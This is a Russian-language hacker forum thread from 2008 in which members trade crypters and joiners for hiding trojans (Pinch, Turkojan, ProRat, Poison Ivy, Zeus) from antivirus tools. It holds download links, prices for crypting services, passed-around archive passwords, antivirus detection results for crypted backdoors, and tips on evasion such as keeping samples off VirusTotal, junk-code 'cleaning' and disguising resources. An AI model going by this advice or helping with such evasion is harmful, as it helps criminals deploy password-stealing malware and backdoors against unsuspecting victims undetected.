Ты за языком свои последи в первую очередь, а потом другим делай замечания
ВИДЕО (http://ifolder.ru/6779838)

Нодом тоже палится

30.05.2008 8:20:30 HTTP filter file http://rs111cg2.rapidshare.com/files/118609399/6230416/malpacker_leaked.rar Win32/Injector.AM trojan connection terminated - quarantined UNNAMED\UNNAMED Threat was detected upon access to web by the application: C:\Program Files\Opera 9.5 beta\opera.exe.

перезалей в другое место ;)

перезалей в другое место ;)
НА (http://dump.ru/file_catalog/379314.aspx)
____
Че по поводу этого скажет сам sql?

специально для вас обясняю !

почиму криптор палиться как тот или иной вирус.
дело в том что этим криптором пользовались т.е. криптовали например пинч или еще какой вирус, после крипта вирус попал на вирустал или просто к антивирсным компаниям.
теперь о сигнатуре
как толко в АВ компании попадает подобный вирус пусть это будет пинч
они снимают сигнатуру именно криптора и вставляют себе в базу
а эта же сигнатура присудствует в крипторе как стаб
стаб - кусок кода который вставляеться в криптованную программу для последующего
раскриптования запуска (как правило находиться в последней секции).
от седакриптор палиться как тот или иной вирус.
так было всегда так будет

Хз...
Ждем Sql

Kulspruta, с Sql требовать нечего, он всего лишь "копипастер забугорный" ... он виноват лишь в том что не проверяет на качество, софт, который выкладывает =\\\\\\\

N1k70 так по твоему я был не прав?

Kulspruta, ты в любом случае будешь не прав ... ты еще ребенок, многово не понимаешь, много плачешь и тп... в этой ситуации нужно было лишь включить мозги и всё, а не наезжать Sql =\\\\\

Нда...обоснуй?

Хз...
Ждем Sql
ненравится не качай иди мимо и не засоряй ветку...Кому нужно тем людям пригодится...

Kulspruta, тебе уже обЪяснил: :)
ненравится не качай иди мимо и не засоряй ветку...Кому нужно тем людям пригодится...

кинул в ветку про пинч/ксинч никто ниче не понял... вопрос специалистам!
Допустим написал программу которая дает привелегии пинчу при переходе на нулевом кольце... там где драйверы работают... обойдет ли мой пинч с такими подозрительными привилегиями проактивку КИСа или фаерволл типа аутпоста(последней версии)?

по моему, нет - так как кис, @, всё - везде палит :)

Мда...сплошной флуд,как я посмотрю,весьма прискорбно(((
Ладно,может кто скажет,последний похернах есть или как,или я чё нить пропустил ?

Люди кто то может криптануть pinch? Сам криптор не прошу прошу криптануть.
Или скажите сколько стоит криптор такой нормальный и не очень дорогой?
Ну или хотябы сколько стоит чтоб один файлик криптануть?

Chrek625 пишы в асю

Люди кто то может криптануть pinch? Сам криптор не прошу прошу криптануть.
Или скажите сколько стоит криптор такой нормальный и не очень дорогой?
Ну или хотябы сколько стоит чтоб один файлик криптануть?
от 1-2$ криптанут! А сам криптор от 20-40$

Зависит от качества криптовки.. например 0 из 32 :)
Также различают ручной крипт Pinch от 15 до 20 $
C помощью криптора от 5 до 10 $

Зависит от качества криптовки.. например 0 из 32 :)
Также различают ручной крипт Pinch от 15 до 20 $
C помощью криптора от 5 до 10 $
Ну вот пусть к те стучит у тя хорошие крипторы!)))

Crypter_Permabatt
http://forum.ninjaspy.org/uploads/monthly_05_2008/post-1-1211735855.gif

Скачать (http://rapidshare.com/files/118608832/Crypter_Permabatt.rar.html )

Mal Packer 1.2 Private
http://img137.imageshack.us/img137/2892/52050069an7.gif


Скачать (http://rapidshare.com/files/118609399/malpacker_leaked.rar.html )

---++
Small_Cypter_by_E0N (http://rapidshare.com/files/118609911/Small_Cypter_by_E0N.rar.html )

Доктор веб пинч криптованый верхим криптором е палит, плиз проверьте на остальых авирях.... Желателен кас, аваст и нод

Мо4х
а крипты делаешь?

все фаилы проверил лично!
никаких вирусов там нет!

Crypter_Permabatt чист 100%


Действительно вирусов нет и криптованый пинч не палится 7 каспером с новыми базами Но вот люди
скажите мне почему после этого крипта и отчёты тоже не приходят?

Оба других паляться доктором вебом

А про pohernah 1.09 чё-нить слышно?

P.S.Здесь присутствуют: 5 (пользователей - 1 , гостей - 4)

Где скачать pohernah 108???

Где скачать pohernah 108???

А на данный момент этот криптор не палиться????

Все про нево говорят, вот тоже решил воспользоваться

народ доктором вебом сто пудняк палиться.
сцылку для похернаха кому-нить в ПМ закинуть?

мне!

да

вон я недавно наткнулся на криптор середины 2007 года, который все еще не палиться (как минимум каспером)
да и связки никто не отменял. так-что паблик жив )

Ну давай ссылку, и мы наткнемся....

Нашел приватный Rcryptor, правда старый, но каспер до сих пор не палит... Попробуйте на остальном...
Рапидко ( http://rapidshare.com/files/119257933/RCryptorPrivateVersion_1.3.rar.html)
НЕ ЗАБЫВАЕМ ПРОВЕРЯТЬ НА ВИРУСЫ!!! МОЙ ДОКТОР ВЕБ НИЧЧЕГО НЕ НАШЕЛ!

Лазил искал крипторы в гугле, и наткнулся на сайт, где все крипторы с этой темы выкладывают...
http://forum.k0d.biz/showthread.php?t=88&page=2
Пора все под пароль ставить, а то потом такие люди их и палят

мда =) не так, так иначе... будут всплывать..... да и не особо тут приватный варез выкладывается, ели что ж)

fri cryptor polymorph

http://rapidshare.de/files/39587045/fricryptor.exe.html

ChaaK Было уже, выкладывали, ну ладно...

народ доктором вебом сто пудняк палиться.
сцылку для похернаха кому-нить в ПМ закинуть?

мне скинь плз)

я тут несколько страниц назад спрашивал.. скиньте у кого есть криптор Daemon Cryptor, вроде V2 Public самая доступная

есть у кого?

Люди есть у кого нить актуальный мануал по ручной криптовке? а то тут выкладывали, но он уже не особо работает

Так уважаемые вирмейкеры и кул хацкеры :) каким крптором спрятать х control ато или палитса но работает или наоборот

Так уважаемые вирмейкеры и кул хацкеры :) каким крптором спрятать х control ато или палитса но работает или наоборот

Pohernah, PolyCrypr

Похернахом невкакую,(криптовал 8 похером).Полі криптор криптует отлично но каспер его палит

вывод: учимся зарабатывать деньги - чтобы прикупить нормальный криптор :)

http://www.google.ru/search?aq=f&complete=1&hl=ru&newwindow=1%3Aru%3Aunofficial&hs=s7p&ie=UTF-8&oe=UTF-8&q=%D0%BA%D1%83%D0%BF%D0%B8%D1%82%D1%8C+%D0%BD%D0%B E%D1%80%D0%BC%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9+ %D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%BE%D1%80&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=lang_ru

fri cryptor polymorph

http://rapidshare.de/files/39587045/fricryptor.exe.html
проверьте авом, возможно там тот фэйк который долгое время упорно распростроняли :mad:

*DeViL* Проверял, вроде он.
А так лучше тести на виртуалки...

я так и делаю, опыт требует))

я тут несколько страниц назад спрашивал.. скиньте у кого есть криптор Daemon Cryptor, вроде V2 Public самая доступная

есть у кого?
Есть: http://depositfiles.com/files/5748742. Пароль на архив: 123

Есть: http://depositfiles.com/files/5748742. Пароль на архив: 123

спасибо большое, тока вот...

Trojan-Dropper.Win32.VB.lv сказал Касперский..

я на самом деле не знаю как правильно определить, это он так на криптор реагирует или с криптором еще что-то склеено?

есть способ определить? я пока не буду запускать

http://www.spywareresources.com/threatdisplay.aspx?name=Trojan-Dropper.Win32.VB.lv&threatid=71245
http://www.threatexpert.com/report.aspx?uid=bac04193-f6bb-4e0f-a4bb-84e6b6adc4e1
сказал ГУГЛ.
посмотрим хекс-редактором... хз...

троев и склейки там нет 100%

раскажу как можно проверять склейку
http://wasm.ru/baixado.php?mode=tool&id=89 здесь берем ольгу
к ней нужен плагин +BP OLLY можно найти в инете (если нет я позже залью)

поставил все можно приступать
итак открываем неизвесный нам фаил
сразу ставим бряки BP CreateFileA(ловим если что то создаеться или открываеться
это определяем по пораметрам апи open или Create)
и bp ShellExecuteA(ловим если начинает чтото запускать )

ну и если на предыдущих бряках мы остановились
тогда ставим дополнительный bp CloseHandle (ждем закрытия хендела
для получения доступа к фаилу) дабы его удалить или убрать из той
дериктории для дальнейшего анализа(если трой)
ну и запускаем если прервались то смотри сам салл функции (последний)шагаем до него
ф8 и ставиб бряк на CloseHandle запускаем прервались идем до самого калла (последний )проходишь его
ну и смотри ту дерикторию где появился фаил
надеюсь хоть чтото понятно если нет то я могу написать болие понятно.

Я пользовался этим криптором, сам его ни с чем не склеивал. Если сомневаешься, запускай на VM или с помощью программы Sandbox. А Касперский так часто реагирует на некоторые крипторы и закриптованные файлы. Так, например, после обработки файла с помощью Simbioz, Каспер опознает его как Trojan.Win32.Agent.aee.

Simbioz помоему палит абсолютно все.

Вот, нашел новую версию Pohernach'а. Пока вроде ничем на палится. Большая просьба:НЕ ПРОВЕРЯТЬ НА ОНЛАЙН-ПРОВЕРКАХ!
Ссылка (http://depositfiles.com/files/5757930)
Проверил только что: уже палится Доктором Вебом. Видимо, кто-то все-таки выложил на проверку.
Не палится Каспером, Нодом, Symantec'ом и Avast'ом.

может ктонить проверит на авчек?????

Похернах 1.0.8 уже давно выкладывали... Палится он уже.

А что вы так пинча боитесь ?
Есть программа MultiPassword recovery, ей можно чистить систему от паролей :). Я отчистил и на пинч насрать ;)

ChaaK Это как так поудалять все пассы с системы? :)
Расскажи подробнее...

Люди дайте линк на нормальный Джойнер.

Вот, нашел новую версию Pohernach'а. Пока вроде ничем на палится. Большая просьба:НЕ ПРОВЕРЯТЬ НА ОНЛАЙН-ПРОВЕРКАХ!
Ссылка (http://depositfiles.com/files/5757930)
Проверил только что: уже палится Доктором Вебом. Видимо, кто-то все-таки выложил на проверку.
Не палится Каспером, Нодом, Symantec'ом и Avast'ом.\


Действительно а в чем прикол? версия номер 1 точка 08 уже давно в пблике.

Вот подборка джойнеров: Fire Joiner, Super Glue и Small Joiner.Ссылка (http://depositfiles.com/files/5762401) Также Free Joiner можно скачать у Gloff'а. Пароль: antichat.

народ! чем зевса криптуете? я ручками попытался... и чего то он загрузиться в память а потом с ошибкой вылетает через секунд 10! может так и должно быть?

А может кто то дать Джойнер который не палится

Chrek625 В тему джойнеров пиши, тут крипторы обсуждаются, выкладываются!!!

на сайте похернаха вышла новая версия 109, только вот пароль к архиву не подходит =)

мб кто нить вскроет пароль?
похернах 109 : http://kascode.nm.ru/pohernah109.rar

Не волнуйся, все будет как должно быть! Надо - откроют!

народ если пасс будет известен киньте в личку тока в обшак не кидайте не то козлы опять на вирус тотале запалят

Пусть автор сам решает кому давать пассы от криптора. Надо будет, выложит, не надо не выложит. Вам будет уроком;)

Killerkod о каком уроке речь ?

Не лить на вирустотал....

Кто автор наха?

Когда будет пас от архива киньте плз мне

Кто автор наха?
Kas

Когда будет пас от архива киньте плз мне
от чего пасс тебе нужен?

похернах 1.0.9

Да..И не только ему пожалуйста))

люди, я вас очень призываю не кидать на вирустотал!!! блин былабы моя воля тембы кто кидал на вирустотал ставилбы БАН пожизненно!!!

Паблик юзают все! Скрывать его от народа преступление! )

Скиньте плиз пасс от pohernah109 в личку. Заранее спасибо! Автору +

Паблик юзают все! Скрывать его от народа преступление! )

ну может он решил терь этот криптар продавать ?

Kas я думаю сам знае кому пароли давать... Если бы хотел ать, то написал бы

подождите немного.. криптор на тестах)
залили его на сайт и через час архив сразу заметили)

Да я думаю если автор даст пасс к архиву в личку, +10х2 ему обеспечено с меня.

Паблик юзают все! Скрывать его от народа преступление! )

а это будет полу паблик, правда сечас его тестируют.
позже думаю будут выдавать пас в личку.

ну тогда ждем

тест закончен !
кто уже скачал криптор скачайте повторно(есть изменения).
итак немного о пороге 109
полиморф в этой версии убран
есть возможность криптования длл (длл радмина криптуеться на ура)
пас, как и договаривались будет высылаться в личку

http://kascode.nm.ru/pnh109.jpg

плз можно мне пасс ? я на вирусостав забил у меня на виртуалке 6 антивирей жывут, если кому чё про тестить то пожалуста=)

Пасс то вообще будут выкладывать? или тока избранным раздадут? ))))

Я бы тоже хотел пасс как раз проверю дллки туркояна... =) На вирустотал ничего не шлю для всех проверок у меня есть акк авчек.ру. =)

просьба писать в личку. а не засорять форум

кому писать то в личку? Касу чтоли?

[G!X]'s Protector v1.2

Copyright (c) 2005 by Guru.eXe, ECG

1. ОПИСАНИЕ ПРОГРАММЫ
2. ОСНОВНЫЕ ВОЗМОЖНОСТИ
3. ИСТОРИЯ ВЕРСИЙ
4. СКОРО
5. ПРЕДУПРЕЖДЕНИЕ
6. КОНТАКТЫ



1. ОПИСАНИЕ ПРОГРАММЫ:

Данная программа предназначена для защиты EXE файлов от определения их компилятора/упаковщика.
Пока содержит только 18 подложных сигнатур:
ASPack 2.000 -> Alexey Solodovnikov
.BJFNT 1.3 -> :MARQUiS:
Neolite 2.0 -> Neoworx Inc.
PC-Guard 4.03 - 4.15 -> Blagoje Ceklic
PE Crypt 1.02 -> random, killa & acpizer
PE Lock NT 2.04 -> :MARQUiS:
PESHiELD 0.25 -> ANAKiN
PEtite 2.1 -> Ian Luck
yoda's cryptor 1.2
SVKP 1.11 -> Pavol Cerven
PEBundle 0.2 - 3.x -> Jeremy Collake
EXE32Pack 1.3x -> SteelBytes
ASPack 2.12 -> Alexey Solodovnikov
PECompact 1.4x or above -> Jeremy Collake
WWPack32 1.x -> Piotr Warezak
PEX 0.99 -> bart/CrackPl
ASPack 2.11d -> Alexey Solodovnikov
и
Nothing found *



2. ОСНОВНЫЕ ВОЗМОЖНОСТИ:

1. Снифферы (анализаторы файлов) после обработки
Вашей программы данным протектором будут выдавать,
что Ваша программа защищена довольно навороченным
протектором. Хотя возможно скоро снифферы начнут
определять данный протектор, но это никак не поможет
крэкерам определить реальный упаковщик

2. Поддержка UPX. Это значит, что перед использованием
данной программы Вы можете запаковать защищаемую программу
этом EXE упаковщиком

3. Возможность изменения имени секции

4. Имеется возможность выбора внедряемой сигнатуры,
обманывающей PEiD и подобные снифферы



2. ИСТОРИЯ ВЕРСИЙ:

- [G!X]'s Protector v1.2
+ Добавлены новые сигнатуры, теперь их 18
+ Улучшена сигнатура NeoLite
+ стиль XP
+ Status bar, просто для красоты
- Исправлена пара ошибок в коде
- Пришлось обратно перейти на английский интерфейс
- [G!X]'s Protector v1.1
+ Переработан интерфейс
+ Полностью переделан код
+ Совершенно иная система защиты файлов
+ В программе 2 сигнатуры (yoda's cryptor, NeoLite)
+ Защита программ написанных на любом языке
+ У проекта новое название [G!X]'s Protector
+ Русский интерфейс
- Убран прежний UPX скрамблер
- Размер программы существенно увеличился
- [G!X]'s UPX-Scrambler + [Double Edition]
+ Улучшена защита
+ Защита программ написанных на Visual С++ [протестировано]
+ Защита программ написанных на Delphi [протестировано]
+ Защита программ написанных на Borland C++ [протестировано]
+ Проек переименован в [G!X]'s UPX-Scrambler +
+ Улучшенный интерфейс
- [G!X]'s UPX Protector v1.0
+ Новый проект назван [G!X]'s UPX Protector
+ Защита от распаковки
+ Защита программ написанных на MASM и TASM [протестировано]



5. СКОРО

+ Добавлю еще как минимум 20 сигнатур, если получится конечно.
Эти 18 дались мне очень тяжело =(
+ Постараюсь поставить затирание секции для UPX
Чтобы было труднее распаковать Вашу программу
+ Возможно, протектор будет распространяться вместе с оболочкой
для UPX! А пока, это два совершенно разных проекта =(
Оффициальный сайт программы UPX: http://upx.sourceforge.net
UPX v1.25w можно скачать по адресу:
http://upx.sourceforge.net/download/upx125w.zip
О новой версии пакеры Вы сможете узнать:
http://upx.sourceforge.net/#unstable



5. ПРЕДУПРЕЖДЕНИЕ

Данный протектор проходил испытания на совместимость лишь с программой
UPX. Поэтому лучше сжимать файлы именно этим пакером.

http://www.team-x.ru/projects/files/protect_me.zip

Проверил 109 похеранах. Мое мнение - положительно. Туркояновы 2 дллки довольно хорошо закриптовались и прога даже смогла сама запускаться без ошибок. Однако вот что расстраивает:
Далее приведены резы с авчека.ру . Для особо тупых обьясняю это ПРИВАТНЫЙ сервис проверки фаилов на аверы который никуда и ничего не шлет...

AVG 8.0 Virus found BackDoor.Delf
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 Win32:Agent-UMM [Trj]
Avira 7.8.0.26 TR/Crypt.XPACK.Gen
BitDefender 7.2 Backdoor.Turkojan.AL
ClamAV 0.93 -
DrWeb 4.44 -
F-Prot 6.0 -
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5309 -
NOD32 3156 probably unknown NewHeur_PE virus
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 -

Криптовал с использованием следующих функций:
Add section
Jmp from entrypoint
Clear rich id
File backup

на каком сервесе проверял???

выходит 9 похернах хренова вышел? я уж скачал его тока пароля не знаю...
правда что он проактивку киса проходит?

на каком сервесе проверял???

Читай четвёртый пост выше

Я бы тоже хотел пасс как раз проверю дллки туркояна... =) На вирустотал ничего не шлю для всех проверок у меня есть акк авчек.ру. =)

lords15 он же написал это нормальный платный сервис

Deneb турку палят по названиям ресурсов
проблема заключается в том что если изменить
имена ресурсов то турка работать не будет.
возможно автор придумает решение в следующей версии

Грот Я думаю ресурсы (всю директорию) можно криптануть. полностью убрать из заголовка :)
А после загрузки файла в память восстановить все :)

Еще тема: поисон ева криптоватся не хочет ни в какую... ПОх говорит о том что слишком маленький фаил(10 кб)...

Грот Я думаю ресурсы (всю директорию) можно криптануть. полностью убрать из заголовка
А после загрузки файла в память восстановить все
а иконки, манифест и тд? )
Еще тема: поисон ева криптоватся не хочет ни в какую... ПОх говорит о том что слишком маленький фаил(10 кб)...
попробуй убери галку Add section

FoX's а иконки, манифест и тд? )
Придется без этого жить) Или создать временную директорию импорта в криптованном файле :)

вышлите плиз пасс от похернаха 109 на мыло legenda_yo@mail.ru или в личку на вирустотал кидать не буду итд итп

Попробовал - не помогло: Can't add section! Small align.

в иве нету ресурсов, как я помню.
пробуйте жать поверх РЛПака 1.20 (1.21 не катит)

троев и склейки там нет 100%

раскажу как можно проверять склейку
http://wasm.ru/baixado.php?mode=tool&id=89 здесь берем ольгу
к ней нужен плагин +BP OLLY можно найти в инете (если нет я позже залью)

поставил все можно приступать
итак открываем неизвесный нам фаил
сразу ставим бряки BP CreateFileA(ловим если что то создаеться или открываеться
это определяем по пораметрам апи open или Create)
и bp ShellExecuteA(ловим если начинает чтото запускать )

ну и если на предыдущих бряках мы остановились
тогда ставим дополнительный bp CloseHandle (ждем закрытия хендела
для получения доступа к фаилу) дабы его удалить или убрать из той
дериктории для дальнейшего анализа(если трой)
ну и запускаем если прервались то смотри сам салл функции (последний)шагаем до него
ф8 и ставиб бряк на CloseHandle запускаем прервались идем до самого калла (последний )проходишь его
ну и смотри ту дерикторию где появился фаил
надеюсь хоть чтото понятно если нет то я могу написать болие понятно.

Вопервых доброе время суток всем!!!
Я не давео начал изучение "этого проекта". и глупых вопросов - как настроить гейт и т.д. пока не возникало. Но пользуясь твоим предложением о более подробном обьяснении - хотел бы им воспользоваться. Если все всиле.
А именно - скачал ольгу и плагин +BP OLLY (там, кроме длл, еще экзешник есть)
Можно по подробней - как его прикрутить к ольге и как им пользоваться НА твоем примере. Заранее спасибо..

Грот, сними лучше видео, лишних вопросов у людей не будет

Так кто нибуть кинет пасс в личку или нет? , целый деню уже жду, и ночь=)

Не ты один...

я написал в личку товарищу Грот с просьбой дать пасс может не тому написал ? :(

я написал в личку товарищу Грот с просьбой дать пасс может не тому написал ? :(
Он тебе не прислал пароль, по простой причине, что его нету в сети!

я написал в личку товарищу Грот с просьбой дать пасс может не тому написал ? :(
Вообщето это криптор Foxa, вот ему просьбу и шли

Пас высылался тем у кого есть сообщения челам с 1 постом и репой 0
пас по естественым причинам не высылался.


CMEPTb пас выслал.

Грот, будь так добр вышли мне тоже пароль, я самый первый в тот раз заметил что похернахъ 1.0.8 стал палиться антивирусом, и был очень огорчен, и очень ждал новой верси...

Киньте пас в личку плз.Ето хорошо что крипторы тепер так дают,меньше палева.Зарание спасибо

Все еще актуален вопрос с поисон евой - паковать чем то сторонним не хотся.

Прорат 1.9 SE с офф саита после криптовки нахом 109
Резы avcheck.ru

AVG 8.0 -
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 Win32:Prorat-FP [Trj]
Avira 7.8.0.26 BDS/Prorat.19.I
BitDefender 7.2 -
ClamAV 0.93 Trojan.Prorat.19-55
DrWeb 4.44 BackDoor.ProRat.19
F-Prot 6.0 W32/Prorat.A.gen!Eldorado
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5310 the BackDoor-AVW trojan
NOD32 3159 -
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 Trojan Horse

Вкл функции(сверху вниз):
Левая колонка: 1,2,4,5
Права колонка:1,4

Все еще актуален вопрос с поисон евой - паковать чем то сторонним не хотся.

Прорат 1.9 SE с офф саита после криптовки нахом 109
Резы avcheck.ru

AVG 8.0 -
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 Win32:Prorat-FP [Trj]
Avira 7.8.0.26 BDS/Prorat.19.I
BitDefender 7.2 -
ClamAV 0.93 Trojan.Prorat.19-55
DrWeb 4.44 BackDoor.ProRat.19
F-Prot 6.0 W32/Prorat.A.gen!Eldorado
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5310 the BackDoor-AVW trojan
NOD32 3159 -
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 Trojan Horse

Вкл функции(сверху вниз):
Левая колонка: 1,2,4,5
Права колонка:1,4
так ты прорат или поизон криптовал?

Все еще актуален вопрос с поисон евой - паковать чем то сторонним не хотся.

Прорат 1.9 SE с офф саита после криптовки нахом 109
Резы avcheck.ru

AVG 8.0 -
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 Win32:Prorat-FP [Trj]
Avira 7.8.0.26 BDS/Prorat.19.I
BitDefender 7.2 -
ClamAV 0.93 Trojan.Prorat.19-55
DrWeb 4.44 BackDoor.ProRat.19
F-Prot 6.0 W32/Prorat.A.gen!Eldorado
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5310 the BackDoor-AVW trojan
NOD32 3159 -
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 Trojan Horse

Вкл функции(сверху вниз):
Левая колонка: 1,2,4,5
Права колонка:1,4

есть решение как это исправить только это возможно будет в 110 версии :)

у меня есть хорошо криптованый прорат тока когда сервер запускаеш то библиотека сразу начинает палится :confused:

Честно сказать я ожидал от 9 похера чего то большего... Почему то не свеже обновленные Каспер и Нод32 на моей виртуалке спалили сразу закриптованные пинч и ботов... мдя... ну бывает....
ПС это лично моё мнение... и не надо мне говорить типа не хочешь не криптуй!
Да у меня есть отличный криптор я его переделал! тока стаб у меня 200 кило... и то что он большой не вызывает ни у кого подозрений! ниодин антивирь не видит! А ВОТ КАСПЕР СУКА ТАК И ОРЁТ.. Потенциально опасное ПО... вот борюсь с проактивкой...

Так дадут пас иль нет уже 2 сутки жду

крипт poison ivy в 110 будет, про туркоян и прорат они upx упак. а pnh с ним плохо + по ресурсам :( все в 110 будет

пароль (http://kascode.nm.ru/pohernah109_pass.txt)

Foxs тебя кто просил пароль в паблег кидать?
Завтра он палиться будет!
ИДИОТ!!!!!
ЗЫ-Здесь присутствуют: 21 (пользователей - 4 , гостей - 17)

Foxs тебя кто просил пароль в паблег кидать?
Завтра он палиться будет!
ИДИОТ!!!!!
ЗЫ-Здесь присутствуют: 21 (пользователей - 4 , гостей - 17)

:D дыбыле ......ты сначала узнай какое он отношение к похернаху имеет :D lol

Да срать, факт в том, что пасс он кинул ВСЕМУ народу, и теперь все будет как с 108!!!

ChaaK Это как так поудалять все пассы с системы? :)
Расскажи подробнее...


Качаем: http://webfile.ru/1994730

Открываем исполняемый файлег.

Программа сканирует систему.
К каждой программе (ну или не к каждой) будет показываться пароль. Чуть выше есть кнопка "Отчистить пароль". Нажимаем ее и повторяем так с каждой программой.
И пинч больше не палит ваши пароли.)

Foxs тебя кто просил пароль в паблег кидать?
Завтра он палиться будет!
ИДИОТ!!!!!
ЗЫ-Здесь присутствуют: 21 (пользователей - 4 , гостей - 17)
Это его криптор и ему решать кидать или нет!!!
А если кинул, то наверное кто-то спалил его уже и теря все равно=( Так что 110 труднее будет получить...

Да срать, факт в том, что пасс он кинул ВСЕМУ народу, и теперь все будет как с 108!!!
А ты кто такой чтобы ему предъявлять? ТЫ сам криптор напиши да чтоб еще не палился и криптовал почти все, потом и будешь тут на форуме решать кому кидать кому нет! Не тебе судить о его действиях

109'ка не очень оправдала себя в плане эффективности поэтому наверн решили выложить в паблик.

А ты кто такой чтобы ему предъявлять? ТЫ сам криптор напиши да чтоб еще не палился и криптовал почти все, потом и будешь тут на форуме решать кому кидать кому нет! Не тебе судить о его действиях
Мля, если бы был у него ник Kas, я бы ниче не говорил, а тут Foxs хз кто такой ^__^
Сорри если кого обидел :D

Почищенный мной криптор CRypt0Z v3 Public.
Извините за результаты - это моя первая чистка)

Данные с авчека: 7 палят

Не палят:
Avast
BitDefender
F-Secure
Kaspersky
NOD32
Panda
Symantec

Доктор жопка определяет(
Пофиг кароче. Вот ссылка:
http://dump.ru/file_catalog/449272

Ваши пожелания на чистку сюда)

ChaaK
Это твоя авторская работа?

ChaaK
Это твоя авторская работа?
непонял :)
я просто решил помочь людям. Нашел криптор почистил его. Выложил. Понравилось. Решил заняться чисткой.
Только я не понимаю как добавить новую секцию. . . Подскажите пожалуйста :)

непонял :)
я просто решил помочь людям. Нашел криптор почистил его. Выложил. Понравилось. Решил заняться чисткой.
Только я не понимаю как добавить новую секцию. . . Подскажите пожалуйста :)
Скачай PETools там есть все что нужно.

ChaaK Ты только чистил, или модифицировал код? Если разбираешься в PE формате стукне мне помогу секцию добавить. :)

ChaaK Ты только чистил, или модифицировал код? Если разбираешься в PE формате стукне мне помогу секцию добавить. :)
я только чистил и добавлял мусора.
+ смешал байты

ChaaK НУ уже хорошо, осталось немного, закодить и помодить :))

я только чистил и добавлял мусора.
+ смешал байты
Чак если время есть нарисуй мануал как чистил.. думаю многим будет интересно... Нигде найти не могу

засоряй криптов в хек редакторе

Ну наиболее легко для новичка чистить что-то, елси есть исходный код!
Если нет, то это намного сложнее.. гиморно!

засоряй криптов в хек редакторе
понимаешь если я прогромирование не особо наю то как мне "просто засорять прорамный код"? я понимаю что его надо засорять но вот допустим если я меняю entrypoint пинча, на мусор с последующим прыжком на изнаальный EP то это от авирей не скроет засорять надо сложнее, потому и прошу мануал чтобы разораться хоть немного... :) Если не жалко, нарисуте плиз если не трудно

Ну ведь есть легкие мануальчики, с которых можно начать...
Выкладывали не раз - ВОТ ЭТОТ (http://glofff.com/my/chisto.rar)

скиньте кто нибудь пасс к pohernah109 пажааалста=) с меня +

крипт poison ivy в 110 будет, про туркоян и прорат они upx упак. а pnh с ним плохо + по ресурсам :( все в 110 будет

пароль (http://kascode.nm.ru/pohernah109_pass.txt)
На для тех кто не читает ничего... Смотри форум на несколько страниц раньше

Ну ведь есть легкие мануальчики, с которых можно начать...
Выкладывали не раз - ВОТ ЭТОТ (http://glofff.com/my/chisto.rar)
GLOFF спасибки, у меня он уже есть, но он также меняет Только EP вставляя мусор перед реальной входящей точкой программы, от антивирей это не скроет=(
Кстати кому надо могу выложить все проги с этого мануала

Почитай вот ЭТО (http://www.glofff.com/my/files.rar) Про структуры PE файлов. После книги можно крипт писать...

вроде ктото просил видео залит по расклейке фаилов,
вот заливаю.

расклейка (http://depositfiles.com/files/5816502)

реверс пинча (http://depositfiles.com/files/5816516) (или куда идет отчет)

сори если гдето косяк, немного неадекватин был я вчера.
:)

расшифровщик (http://depositfiles.com/files/5799367)

плагины к ольге (http://depositfiles.com/files/5796656)

Уважаемые кодеры... хм.. пишу криптор но палиться всеми антивирями вот эта функция GetModuleFileName
может аналог есть её? хоть на асме хоть как нить поменять на аналогичную....
может кто знает?

Сообщение от GlOFF
Почитай вот ЭТО Про структуры PE файлов. После книги можно крипт писать...

Примеры программ в книге на синтаксисе С++...

Примеры программ в книге на синтаксисе С++...
Я изучал только делфи и то оч давно и немного=(

Я изучал только делфи и то оч давно и немного=(
если знаешь хоть чучуть один язык програмирования там дальше дело техники проб и ошибок (кроме АСЕМА)

если знаешь хоть чучуть один язык програмирования там дальше дело техники проб и ошибок (кроме АСЕМА)

Нуу эт ты загнул)
Если я знаю php,perl c# то c++ для меня остается сложной вещью.
Там практически все по другому...

А что лучше, сначала паковать и потом криптовать, или наоборот?

А что лучше, сначала паковать и потом криптовать, или наоборот?

Паковать я тебе вообще не советую. Сказывается на работоспособности приложения.
Лучше сначала крипт, потом протектер/антиотладчик. После ручная криптовка.

Nek1t от пакера и криптора зависит. И в каждой ситуации свое...
Смотри как удобнее будет, чтобы работало да меньше чтобы палилось, так и делай.

Ну дайте кто нибуть пароль к Pohernah 1.0.9

а выше посмотреть не судьба?

Криптанул Pinch 2.99 от slash`а похнахом 1,09 склеил фриджунером,
Нод, каспер, дрвеб, аваст, не запалили.
Я был в шоке, когда заорал Mail.ru агент.
Типа пароли с вшего PC будут переданы 3 лицу...
Кто знает, в чем фишка?
P/S/ Получил пмнчевский отчет (92кб)(от того же Pinch 2.99 от slash`а) Parser 2.3.1.8. его не видит. Другие проходят на ура, с чем может быть связано, подскажите.

Ну дайте кто нибуть пароль к Pohernah 1.0.9
kascode<^>109 :)

mail.ru агент запорол отчет пинча :D :D :D

mail.ru агент запорол отчет пинча :D :D :D
:) Не отчет, а сам пинч.Читайте внимательнее...

Паковать я тебе вообще не советую.
Ну все таки размер раза в 3-4 уменьшается... :confused:
Сказывается на работоспособности приложения.
Согласен, все время проверять приходится. Ну вот PECompact вроде ничего так...
Лучше сначала крипт
Да у меня и после криторов редко что работало :D Пробовал криптовать Notepad.exe криптором CRypt0Z v3 Public (ну на 138 странице лежит). Так размер вырос сильно + блокнот даже не запустился :D
потом протектер/антиотладчик.
И после этого троян будет работать?) ;)




pohernah109 с kascode.nm.ru не с чем не склееный?

вроде ктото просил видео залит по расклейке фаилов,
вот заливаю.

расклейка (http://depositfiles.com/files/5816502)

реверс пинча (http://depositfiles.com/files/5816516) (или куда идет отчет)

сори если гдето косяк, немного неадекватин был я вчера.
:)

